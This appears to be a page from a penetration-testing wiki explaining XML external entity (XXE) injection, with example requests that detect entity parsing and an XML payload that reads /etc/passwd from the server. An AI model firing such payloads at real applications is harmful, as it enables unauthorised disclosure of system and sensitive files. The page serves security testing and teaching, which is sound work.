The Hacker Recipes
GitHubTwitterDonate
Search…
Introduction
Active Directory
Reconnaissance
Movement
Persistence
Web services
Reconnaissance
Configuration
Accounts and sessions
User inputs
🛠️ File inclusion
SQL injection
XSS (Cross-Site Scripting)
Unrestricted file upload
CSRF (Cross-Site Request Forgery)
🛠️ HTTP parameter pollution
IDOR (Insecure Direct Object Reference)
Open redirect
Insecure JSON Web Tokens
Insecure Cookies
🛠️ SSTI (Server-Side Template Injection)
🛠️ Insecure deserialization
SSRF (Server-Side Request Forgery)
XXE injection
🛠️ CRLF injection
HTTP response splitting
🛠️ Arbitrary file download
🛠️ Directory traversal
🛠️ Null-byte injection
🛠️ Content-type juggling
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ binary exploitation
Use-after-free
Buffer overflow
🛠️ mobile apps
Android
iOS
Powered By GitBook
XXE injection

Theory

Some web applications handle data and rely on the XML format to exchange data with the browsers.
XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data (portswigger).
XXE injections can sometimes lead to SSRF (Server-Side Request Forgery), Local File Disclosure, Sensitive Information Disclosure, Data Exfiltration, RCE (Remote Code Execution) and so on.

Practice

Testers need to find input vectors and forms that send XML formatted data to the application.
For instance, in the following request, the user submitted a search form with the input "TESTINPUT".
1
POST /action HTTP/1.1
2
Host: some.website
3
[...]
4
Connection: close
5
6
<?xml version="1.0"?>
7
<searchForm>
8
<from>TESTINPUT</from>
9
</searchForm>
Copied!
The tester can detect if the XML parser parses the external entities by defining one inside a DOCTYPE element, and checking if the value in the from element gets replaced (the value will be replaced in the reflected messages sent by the application like error messages, search results).
1
<?xml version="1.0"?>
2
<!DOCTYPE xxeinjection [ <!ENTITY newfrom "VULNERABLE"> ]>
3
<searchForm>
4
<from>&newfrom;</from>
5
</searchForm>
Copied!
A vulnerable application should replace the value by "VULNERABLE". The tester can then try to disclose local files by replacing the from value with the content of a sensitive file (e.g. /etc/passwd).
1
<?xml version="1.0"?>
2
<!DOCTYPE xxeinjection [ <!ENTITY newfrom SYSTEM "file:///etc/passwd"> ]>
3
<searchForm>
4
<from>&newfrom;</from>
5
</searchForm>
Copied!

References

What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy
WebSecAcademy
Penetration Testing and Vulnerability Assessment: ENCIPHERS
ENCIPHERS: Demystifying Security, one vulnerability at a time
PayloadsAllTheThings/XXE Injection at master · swisskyrepo/PayloadsAllTheThings
GitHub
Previous
SSRF (Server-Side Request Forgery)
Next
🛠️ CRLF injection
Last modified 1yr ago
Copy link
Edit on GitHub
Contents
Theory
Practice
References